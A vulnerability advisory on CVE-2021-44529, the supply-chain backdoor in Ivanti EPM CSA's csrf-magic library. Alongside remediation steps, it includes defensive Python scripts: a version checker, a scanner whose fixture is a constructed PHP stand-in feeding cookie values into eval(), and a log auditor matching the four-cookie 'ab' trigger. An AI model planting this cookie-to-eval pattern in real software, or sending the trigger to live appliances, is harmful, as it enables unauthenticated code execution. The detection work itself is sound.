CVE-2021-44529

Ivanti EPM CSA — Unauthenticated Remote Code Execution via Backdoored csrf-magic PHP Library
🔥 CVSS 3.1  9.8 / 10 — CRITICAL 🔴 CISA Known Exploited Vulnerability

What is Ivanti Endpoint Manager Cloud Service Appliance (EPM CSA)?

Ivanti Endpoint Manager Cloud Service Appliance (EPM CSA) is a hardware/virtual Internet gateway appliance that allows devices located outside the corporate network — laptops, field devices, remote workers — to communicate securely with the Ivanti EPM core server as if they were on the internal LAN. It functions as a secure reverse proxy and authentication relay, bridging off-network agents back to the EPM management infrastructure over the public Internet.

EPM CSA is distinct from Ivanti EPM itself:

  • Ivanti EPM (Endpoint Manager) is the on-premises management console responsible for inventory, patch deployment, software distribution, and remote control of managed endpoints.
  • Ivanti EPM CSA (Cloud Service Appliance) is a separate Linux-based appliance — deployed either as a physical device or a virtual machine in a DMZ — that acts as the internet-facing relay point allowing off-network EPM agents to reach the core server.

Because the CSA is intentionally exposed to the internet and handles authentication traffic from all managed off-network devices, it is a high-value attack target. Compromising the CSA gives an attacker a foothold within the device management communication path for the entire managed fleet.

Overview

Ivanti Endpoint Manager Cloud Service Appliance (EPM CSA) contains a code injection vulnerability (CWE-94) that allows an unauthenticated remote attacker to execute arbitrary code on the appliance with the permissions of the nobody user. The vulnerable endpoint is /client/index.php, and the exploitable code is embedded in the PHP library file /opt/landesk/broker/webroot/lib/csrf-magic.php.

What makes this vulnerability particularly notable is how it originated: research published in 2024 by GreyNoise Labs and Sonatype found strong evidence that the vulnerability is not a conventional code injection flaw but rather a supply-chain backdoor — malicious eval() code was covertly introduced into the open-source csrf-magic library in a commit labeled "1.0.5 update" (dated February 1, 2014), and that poisoned version was subsequently bundled into Ivanti's EPM CSA product. The backdoor may have been present in the product for approximately seven years before discovery.

CISA added CVE-2021-44529 to the KEV catalog on March 25, 2024 — over two years after the original advisory — confirming that active exploitation was observed. The CISA KEV entry notes ransomware actor use.

Affected Versions

Version Status
EPM CSA 4.5 Vulnerable
EPM CSA 4.6 prior to 4.6.0-512 Vulnerable
EPM CSA 4.6.0-512 Fixed

Note: CSA 4.5 has reached end of life and will not receive a fix. Organizations on CSA 4.5 must upgrade to a supported 4.6 release; the fix ships in CSA 4.6 build 512 or later.
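The version table above is simple to read but easy to get wrong in an inventory script, because "4.6.0-1000" sorts before "4.6.0-512" as a string. The check below is an added example, not an Ivanti tool: it parses banners in the assumed "major.minor[.patch][-build]" form the table uses, compares them numerically against 4.6.0-512, and treats anything it cannot place at or past the fixed build as vulnerable. The hostnames and versions in SAMPLE_FLEET are constructed.

```python
import re
from typing import NamedTuple, Optional

# Fixed release named in Ivanti SA-2021-12-02: CSA 4.6 build 512.
FIXED = (4, 6, 0, 512)


class CsaVersion(NamedTuple):
    major: int
    minor: int
    patch: int
    build: Optional[int]  # None when the banner omits the build number


# Assumed banner format "major.minor[.patch][-build]", e.g. "4.6.0-512" or "4.5".
_VERSION_RE = re.compile(r"^\s*v?(\d+)\.(\d+)(?:\.(\d+))?(?:-(\d+))?\s*$")


def parse_csa_version(text: str) -> CsaVersion:
    m = _VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised CSA version string: {text!r}")
    major, minor, patch, build = m.groups()
    return CsaVersion(int(major), int(minor), int(patch or 0),
                      int(build) if build is not None else None)


def assess(text: str) -> tuple[bool, str]:
    """Return (vulnerable, reason) for one appliance banner.

    Comparison is numeric field by field; a plain string compare would rank
    "4.6.0-1000" below "4.6.0-512" and mis-classify a patched appliance.
    Anything that cannot be shown to be at or past the fixed build is treated
    as vulnerable, the conservative call for an internet-facing box. A later
    4.6 patch level (e.g. 4.6.1-x) is assumed to carry the fix.
    """
    v = parse_csa_version(text)
    line = (v.major, v.minor)
    if line < (4, 5):
        return True, "older than the 4.5/4.6 line covered by the advisory; unsupported, treat as vulnerable"
    if line == (4, 5):
        return True, "CSA 4.5 is end of life and has no fix; upgrade to 4.6.0-512 or later"
    if line > (4, 6):
        return False, "newer than the affected 4.6 line"
    if v.build is None:
        return True, "4.6 without a build number: cannot confirm build 512+, treat as vulnerable"
    if (v.major, v.minor, v.patch, v.build) >= FIXED:
        return False, f"4.6 build {v.build} is at or past the fixed build 512"
    return True, f"4.6 build {v.build} is before the fixed build 512"


def triage(banners: dict[str, str]) -> list[tuple[str, str, bool, str]]:
    """Assess a host->banner map; vulnerable hosts come first for a fleet report."""
    rows = []
    for host, banner in banners.items():
        try:
            vulnerable, reason = assess(banner)
        except ValueError as exc:
            vulnerable, reason = True, f"unparseable banner ({exc}); treat as vulnerable"
        rows.append((host, banner, vulnerable, reason))
    rows.sort(key=lambda r: (not r[2], r[0]))
    return rows


# Constructed sample inventory (hostnames and versions are illustrative, not real data).
SAMPLE_FLEET = {
    "csa-dmz-01.example.net": "4.6.0-512",
    "csa-dmz-02.example.net": "4.6.0-511",
    "csa-dmz-03.example.net": "4.6.0-1000",
    "csa-legacy.example.net": "4.5",
    "csa-unknown.example.net": "4.6",
}

if __name__ == "__main__":
    for host, banner, vulnerable, reason in triage(SAMPLE_FLEET):
        flag = "VULNERABLE" if vulnerable else "ok        "
        print(f"{flag}  {host:<26} {banner:<12} {reason}")
```

Feed it the version strings from your appliance inventory or the CSA web console banner; anything that comes back flagged, including unparseable banners, goes on the upgrade list rather than being assumed safe.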

Technical Details

CVE-2021-44529 is a CWE-94 (Improper Control of Generation of Code / Code Injection) vulnerability. The root of the issue lies in backdoored PHP code embedded in csrf-magic.php, a library Ivanti bundled with EPM CSA.

The backdoor mechanism:

The malicious code, located between lines 399 and 407 of /opt/landesk/broker/webroot/lib/csrf-magic.php, reads values from HTTP cookies passed to the /client/index.php endpoint. The attack requires at least four cookies:

  • The first cookie must contain the value ab
  • The remaining three cookie values are concatenated, run through a light de-obfuscation and base64 decode, and passed directly to PHP's eval() function

This means a crafted HTTP request with specifically structured cookie values causes the appliance to execute arbitrary PHP code server-side — with no authentication required.

Supply-chain origin:

The malicious commit ("1.0.5 update," commit hash f7f84f8, dated February 1, 2014) was introduced to a GitHub clone of the legitimate csrf-magic project. The commit is absent from the official csrf-magic repository and no longer appears in any known mirror, suggesting it was crafted specifically for supply-chain insertion. Ivanti bundled this poisoned version into EPM CSA, embedding the backdoor in the product for years.

Attack characteristics:

  • No authentication required
  • Single HTTP request with crafted cookie values is sufficient
  • Executed code runs as the nobody user (limited OS privileges), but sufficient for initial foothold
  • A public Metasploit module (Rapid7) exists for this vulnerability
  • Nuclei detection templates are publicly available

CWE-94 (Improper Control of Generation of Code): The product constructs code using externally influenced input without neutralizing elements that could modify the intended code behavior. In this case, cookie-supplied values flow directly into eval() without sanitization.
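The signature described above, a $_COOKIE read feeding an eval() a few lines later, can be checked statically across a webroot. The scanner below is an added example, not Ivanti's or csrf-magic's code. Its SUSPICIOUS_PHP fixture is a constructed stand-in modelled on the description (trigger value in the first of four-plus cookies, concatenation, decode, eval), not the real backdoored lines, and BENIGN_PHP approximates csrf-magic's legitimate cookie handling so the scanner can be shown not to fire on it. scan_tree() is the entry point for a real tree such as /opt/landesk/broker/webroot.

```python
import re
from dataclasses import dataclass
from pathlib import Path

# Indicators: eval() of runtime-built code, reads of request cookies, and the
# decoders typically wrapped around a hidden payload. Each alone is common in
# PHP (csrf-magic legitimately reads cookies); the signal is their proximity.
EVAL_RE = re.compile(r"\beval\s*\(", re.IGNORECASE)
COOKIE_RE = re.compile(r"\$_COOKIE\b|\$HTTP_COOKIE_VARS\b")
DECODE_RE = re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(",
                       re.IGNORECASE)


@dataclass
class Finding:
    path: str
    line: int          # 1-based line of the eval() call
    cookie_line: int   # nearest cookie read feeding it
    obfuscated: bool   # a decoder sits between the cookie read and the eval
    snippet: str


def scan_php_source(path: str, source: str, window: int = 15) -> list[Finding]:
    """Flag every eval() within `window` lines of a $_COOKIE read.

    The csrf-magic backdoor occupied under a dozen lines, so a small window
    keeps noise down while still catching an inlined payload loader. Lone
    eval() calls are deliberately not reported here; review them separately
    if the file is not expected to contain any.
    """
    lines = source.splitlines()
    cookie_lines = [n for n, text in enumerate(lines, 1) if COOKIE_RE.search(text)]
    findings: list[Finding] = []
    for n, text in enumerate(lines, 1):
        if not EVAL_RE.search(text):
            continue
        near = [c for c in cookie_lines if abs(c - n) <= window]
        if not near:
            continue
        c = min(near, key=lambda k: abs(k - n))
        lo, hi = sorted((c, n))
        obfuscated = any(DECODE_RE.search(lines[i - 1]) for i in range(lo, hi + 1))
        findings.append(Finding(path, n, c, obfuscated, text.strip()))
    return findings


def scan_tree(root: str) -> list[Finding]:
    """Scan every .php file under root (e.g. /opt/landesk/broker/webroot on a CSA)."""
    out: list[Finding] = []
    for p in Path(root).rglob("*.php"):
        try:
            out.extend(scan_php_source(str(p), p.read_text(errors="replace")))
        except OSError:
            continue
    return out


# Constructed sample 1: a cookie-reading fragment in the style of csrf-magic's
# legitimate token handling. No eval(), so it must not be flagged.
BENIGN_PHP = """<?php
function csrf_get_tokens() {
    $secret = csrf_get_secret();
    if (csrf_get('cookie')) {
        $cookie = csrf_get('cookie');
        if (isset($_COOKIE[$cookie])) {
            return $_COOKIE[$cookie];
        }
    }
    return csrf_hash($secret);
}
"""

# Constructed sample 2: a stand-in modelled on the page's description of the
# backdoor. This is illustrative code, NOT the actual backdoored csrf-magic.php;
# the function name is invented and the decode step is plain base64 rather than
# whatever obfuscation the real library used.
SUSPICIOUS_PHP = """<?php
function example_cookie_hook() {
    $c = array_values($_COOKIE);
    if (count($c) >= 4 && $c[0] === 'ab') {
        $code = base64_decode($c[1] . $c[2] . $c[3]);
        eval($code);
    }
    return true;
}
"""


def scan_samples() -> dict[str, list[Finding]]:
    return {
        "benign.php": scan_php_source("benign.php", BENIGN_PHP),
        "suspicious.php": scan_php_source("suspicious.php", SUSPICIOUS_PHP),
    }


if __name__ == "__main__":
    for path, found in scan_samples().items():
        print(f"{path}: {len(found)} finding(s)")
        for f in found:
            tag = "obfuscated cookie-to-eval" if f.obfuscated else "cookie-to-eval"
            print(f"  line {f.line} ({tag}, cookie read at line {f.cookie_line}): {f.snippet}")
```

A hit is a reason to diff the file against the copy in the patched release, not proof of compromise on its own; conversely a clean scan of csrf-magic.php after upgrading to 4.6.0-512 is the expected state, and any eval() that remains elsewhere in the webroot deserves a look regardless of whether a cookie read sits next to it.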

Discovery

Security researcher Jakub Kramarz is credited with discovering CVE-2021-44529. Ivanti published Security Advisory SA-2021-12-02 on December 2, 2021, framing the issue as a code injection vulnerability.

In February 2024, GreyNoise Labs and Sonatype independently published deeper analyses reconsidering the nature of the flaw. Both concluded that the vulnerability is better characterized as a supply-chain backdoor deliberately introduced into the csrf-magic PHP library, rather than an accidental programming error. GreyNoise noted the original malicious commit had been scrubbed from public repositories, making forensic reconstruction difficult. Bitsight subsequently published research detailing how the backdoor's distinctive fingerprint could itself be used as a detection mechanism to identify vulnerable or compromised appliances.

Exploitation Context

CISA added CVE-2021-44529 to the KEV catalog on March 25, 2024 — more than two years after the initial advisory — confirming that threat actors were actively exploiting the vulnerability. The KEV entry attributes use to ransomware actors.

The long gap between the initial 2021 advisory (when public exploit tooling was not widely available) and the 2024 KEV addition likely reflects that exploitation became more widespread after Metasploit module availability lowered the barrier to weaponization. Internet scans conducted around the time of KEV listing found approximately 1,748 internet-facing Ivanti CSA instances, of which at least 41 remained vulnerable to CVE-2021-44529.

The supply-chain nature of the backdoor also raises a broader concern: if the csrf-magic poisoning predates the 2021 discovery, the backdoor may have been accessible to a threat actor aware of it for years before public disclosure — an unknown pre-disclosure exploitation window.

Remediation

  1. Upgrade EPM CSA to version 4.6.0-512 or later — this is the only fix; apply it immediately via the Ivanti update mechanism
  2. Discontinue CSA 4.5 — CSA 4.5 is end-of-life and will not receive patches; migrate to a supported release
  3. Restrict internet access to the CSA management interface — while the CSA is intentionally internet-exposed for agent communication, management and administrative interfaces should be firewalled to trusted IP ranges only
  4. Audit CSA access logs — review logs for requests to /client/index.php with unusual cookie patterns (four or more cookies, the first carrying the value ab), particularly from unexpected source IPs, covering the period before the patch was applied. Stock web-server access logs do not record the Cookie header; unless cookie logging was enabled or traffic was captured at a proxy or IDS, the audit is limited to source IPs, user agents and request volume against /client/index.php
  5. Treat the CSA as potentially compromised — if the appliance was exposed to the internet running a vulnerable version without network controls, assume exploitation may have occurred; forensically image the appliance before remediation if possible
  6. Check for persistence mechanisms — the nobody execution context limits direct system-level persistence, but review the webroot for added or modified PHP files (web shells), compare csrf-magic.php and the other bundled libraries against the patched release, and look for cron jobs added under web server accounts
  7. Rotate credentials passed through the CSA — EPM agent authentication tokens and any credentials transiting the CSA should be rotated after confirmed or suspected compromise
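Step 4 is concrete enough to script. The audit below is an added example, not an Ivanti tool, and assumes the appliance's web server writes Apache combined-format lines with the Cookie request header appended as a final quoted field (an httpd LogFormat ending in "%{Cookie}i"); the SAMPLE_LOG lines are constructed, with addresses from documentation ranges and made-up cookie values. Against stock logs that carry no cookie field it degrades to flagging /client/index.php requests by source and user agent.

```python
import re
from datetime import datetime
from typing import Optional

# Assumed log line layout: Apache "combined" format followed by the Cookie
# request header as an extra quoted field (LogFormat ending in "%{Cookie}i").
# The cookie group is optional so plain combined logs still parse.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"(?: "(?P<cookie>[^"]*)")?$'
)
TARGET_PATH = "/client/index.php"
TRIGGER_VALUE = "ab"   # first cookie value the page describes as the trigger
MIN_COOKIES = 4        # the backdoor needs at least four cookies


def parse_cookies(header: Optional[str]) -> list[tuple[str, str]]:
    """Split a Cookie header into (name, value) pairs, order preserved."""
    if not header or header == "-":
        return []
    pairs = []
    for part in header.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((name.strip(), value.strip()))
    return pairs


def parse_ts(raw: str) -> datetime:
    """Parse the bracketed Apache timestamp, e.g. 20/Mar/2024:10:15:32 +0000."""
    return datetime.strptime(raw, "%d/%b/%Y:%H:%M:%S %z")


def classify(line: str, patched_at: Optional[datetime] = None) -> Optional[dict]:
    """Return a finding for a /client/index.php request, or None.

    Severity:
      high   - four or more cookies and the first value is 'ab' (the trigger shape)
      medium - four or more cookies, first value something else
      low    - fewer cookies; normal agent traffic looks like this, kept for
               source-IP triage against unexpected origins
    Requests at or after `patched_at` are skipped when it is given.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    if m["target"].split("?", 1)[0] != TARGET_PATH:
        return None
    ts = parse_ts(m["ts"])
    if patched_at is not None and ts >= patched_at:
        return None
    cookies = parse_cookies(m["cookie"])
    if len(cookies) >= MIN_COOKIES and cookies[0][1] == TRIGGER_VALUE:
        severity = "high"
    elif len(cookies) >= MIN_COOKIES:
        severity = "medium"
    else:
        severity = "low"
    return {"ip": m["ip"], "ts": ts, "status": int(m["status"]),
            "ua": m["ua"], "cookies": len(cookies), "severity": severity}


def audit(lines, patched_at: Optional[datetime] = None) -> list[dict]:
    return [f for f in (classify(l, patched_at) for l in lines) if f]


# Constructed sample log lines (documentation-range addresses, made-up values).
SAMPLE_LOG = """\
198.51.100.23 - - [20/Mar/2024:09:02:11 +0000] "POST /client/index.php HTTP/1.1" 200 184 "-" "LANDesk Agent" "sessionid=7f3a"
203.0.113.7 - - [20/Mar/2024:10:15:32 +0000] "GET /client/index.php HTTP/1.1" 200 512 "-" "python-requests/2.31" "a=ab; b=Zm9v; c=YmFy; d=YmF6"
203.0.113.7 - - [20/Mar/2024:10:15:33 +0000] "GET /client/index.php HTTP/1.1" 200 512 "-" "python-requests/2.31" "a=ab; b=Zm9v; c=YmFy; d=YmF6"
192.0.2.44 - - [20/Mar/2024:11:40:05 +0000] "GET /client/index.php?x=1 HTTP/1.1" 200 77 "-" "curl/8.4.0" "p=1; q=2; r=3; s=4"
198.51.100.23 - - [21/Mar/2024:08:00:00 +0000] "GET /images/logo.png HTTP/1.1" 200 4020 "-" "Mozilla/5.0" "-"
"""

if __name__ == "__main__":
    for f in audit(SAMPLE_LOG.splitlines()):
        print(f"{f['severity']:<6} {f['ip']:<15} {f['ts']:%Y-%m-%d %H:%M:%S} "
              f"cookies={f['cookies']} ua={f['ua']}")
```

Pass the patch time as `patched_at` so the report covers only the exposure window; a "high" hit is a strong indicator and should move the appliance straight to the treat-as-compromised path in step 5, while "low" hits are only interesting when the source is not a known agent population.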

Key Details

Property               Value
CVE ID                 CVE-2021-44529
Vendor / Product       Ivanti — Endpoint Manager Cloud Service Appliance (EPM CSA)
NVD Published          2021-12-08
NVD Last Modified      2025-11-03
CVSS 3.1 Score         9.8
CVSS 3.1 Vector        CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Severity               CRITICAL
CWE                    CWE-94
CISA KEV Added         2024-03-25
CISA KEV Deadline      2024-04-15
Known Ransomware Use   ⚠️ Yes

CVSS 3.1 Breakdown

Metric                 Value
Attack Vector          Network (AV:N)
Attack Complexity      Low (AC:L)
Privileges Required    None (PR:N)
User Interaction       None (UI:N)
Scope                  Unchanged (S:U)
Confidentiality        High (C:H)
Integrity              High (I:H)
Availability           High (A:H)

Required Action

CISA BOD 22-01 Deadline: 2024-04-15. Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.

Timeline

Date         Event
2014-02-01   Malicious csrf-magic commit (labeled '1.0.5 update') introduced to a GitHub clone of the project, embedding the backdoor eval() code; the suspected origin of what later became CVE-2021-44529
2021-12-02   Ivanti publishes Security Advisory SA-2021-12-02, describing the issue as a 'code injection' vulnerability in EPM CSA
2021-12-08   CVE-2021-44529 published in NVD with CVSS score 9.8 Critical
2024-02-01   GreyNoise Labs and Sonatype publish research re-examining the vulnerability, arguing it is better characterized as a supply-chain backdoor embedded in csrf-magic.php than as a conventional code injection flaw
2024-03-25   CISA adds CVE-2021-44529 to the Known Exploited Vulnerabilities catalog, confirming active exploitation more than two years after the initial advisory
2024-04-15   CISA BOD 22-01 remediation deadline